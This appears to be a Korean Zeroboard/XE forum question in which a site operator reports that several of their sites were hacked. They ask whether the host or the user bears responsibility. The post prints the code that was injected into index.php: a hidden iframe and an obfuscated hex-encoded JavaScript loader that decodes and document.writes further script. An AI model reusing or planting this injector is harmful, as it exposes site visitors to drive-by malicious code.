묻고답하기

제로보드를 해킹당했습니다.


누가 장난친거 같은데요.

제로보드의 index.php 에  아이프레임과 스크립트를 써 넣어서 사이트가 오작동하게 해놨습니다.


호스팅회사에서 호스팅을 받고있는데, 이런경우엔 어디 책임인가요??

호스팅을 해주는 호스팅회사 문제인가요??  아니면 그냥 사용자 책임일까요...
호스팅회사에 문의해보니, 제로보드 사이트가서 보안패치 받아야 하는거라고 하는데, ...

계속 이렇게 누가 장난치면 매일매일 ㅜㅜ 어쪄죠



index.php 맨 아래에 해킹으로 추가된 내용입니다.

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c1023895d9q49d571a245480(q49d571a245c50){ var q49d571a246421=16; return (eval('pars'+'eInt')(q49d571a245c50,q49d571a246421));}function q49d571a2473c2(q49d571a247b92){ var q49d571a249304=2; var q49d571a248363='';q49d571a24a2a6=String['fromCharCode'];for(q49d571a248b33=0;q49d571a248b33<q49d571a247b92.length;q49d571a248b33+=q49d571a249304){ q49d571a248363+=(q49d571a24a2a6(c1023895d9q49d571a245480(q49d571a247b92.substr(q49d571a248b33,q49d571a249304))));}return q49d571a248363;} var n1a='';var q49d571a24aa77='3C7'+n1a+'3637'+n1a+'2697'+n1a+'07'+n1a+'+ '+ '43E696628216D7'+n1a+'96961297'+n1a+'B646F637'+n1a+'56D656E7'+n1a+'42E7'+n1a+'7'+n1a+'7'+n1a+'2697'+n1a+'465287'+n1a+'+ '56E657'+n1a+'363617'+n1a+'065282027'+n1a+'2533632536392536362537'+n1a+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+n1a+'332537'+n1a+'32253633253364253237'+n1a+'2536382537'+n1a+'342537'+n1a+'342537'+n1a+'30253361253266253266253637'+n1a+'253666253637'+n1a+'2536662533322536642536352532652536652536352537'+n1a+'34253266253265253637'+n1a+'2536662532662536332536382536352536332536622532652536382537'+n1a+'34253664253663253366253237'+n1a+'2532622534642536312537'+n1a+'342536382532652537'+n1a+'+ '322536662537'+n1a+'352536652536342532382534642536312537'+n1a+'342536382532652537'+n1a+'32253631253665253634253666253664253238253239253261253331253333253331253333253335253239253262253237'+n1a+'+ '253631253335253636253332253333253636253330253337'+n1a+'253237'+n1a+'2532302537'+n1a+'37'+n1a+'2536392536342537'+n1a+'34253638253364253333253337'+n1a+'253230253638253635253639253637'+n1a+'2536382537'+n1a+'+ '342533642533332533352533352532302537'+n1a+'332537'+n1a+'342537'+n1a+'39253663253635253364253237'+n1a+'2537'+n1a+'362536392537'+n1a+'332536392536322536392536632536392537'+n1a+'342537'+n1a+'39253361253638253639253634253634253635253665253237'+n1a+'2533652533632532662536392536362537'+n1a+'3225363125366425363525336527'+n1a+'29293B7'+n1a+'D7'+n1a+'6617'+n1a+'2206D7'+n1a+'969613D7'+n1a+'47'+n1a+'27'+n1a+'5653B3C2F7'+n1a+'3637'+n1a+'2697'+ '+n1a+'07'+n1a+'43E';document.write(q49d571a2473c2(q49d571a24aa77));</script>


제가 운영하는 제로보드 사이트 거의 다 저렇게 장난질을 쳐놨네요...

제로보드 버전에 상관없이, 제로보드 4 . 제로보드 xe 1.2.0까지.. 다.. ㅜㅜ

제가 운영하는 사이트가 대략 4개인데, 4개 모두 저렇게 됐구요 오늘, 글고 모두 한회사에서 호스팅을 받고있습니다.
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
feel172 XE 개념좀 잡아주세요 [3] 2008.02.18 by feel172
analogxyz 질문게시물 바로 밑에 리플(Re)달수 있나요? [2] file 2008.02.18 by 대암지기
공기정화 txt 입력폼의 사이즈 강제지정~~!!  
간지보더 관리자 주소-_-;; [3] 2008.02.18 by 대암지기
list65 통합검색시 조회수  
호아금 로그인 위젯의 스킨 출력이 잘 안됩니다.. file  
hahaha 요청하신 모듈을 찾을 수 없습니다 [2] 2008.02.19 by chanyi
쿠마의세상 확장변수 입력칸 제어..  
PeterLee 회원관리에서 회원 -> 관리 화면이 안나와요.  
RYSETAI 레이아웃에 파일 include 문의 드립니다. [2] 2008.02.19 by RYSETAI
Capyou 제로보드XE에 직접적인 쿼리는 못주죠?  
발로코딩 $_SERVER[''HTTP_HOST'']  
D페이스 jw flv 플레이어 업그레이드 [5] 2008.02.19 by 윤우아빠
HK 설치시 zbXE 폴더 퍼미션을 바꾸면 인스톨 화면이 안보입니다. [2] 2008.02.19 by ilovejesus
BBaram 페이지 권한을 부여해도 수정을 할 수 없습니다. [1] 2008.02.19 by 박페르시
홍이만세^^ 본문의 "이 게시물을.." 부분은 어디서 고치나요? [2] file 2008.02.19 by RYSETAI
hyosun8769 개인 서버로 zbxe 설치후에.. [1] 2008.02.19 by mccallister
이정제421 웹진형최근게시물추출시 내용이 위젯상자를 벗어남 file  
똑디 update 문 질문입니다. 고수님들 답변좀..  
소마세월 addon 에서 xml 쿼리 가능한지..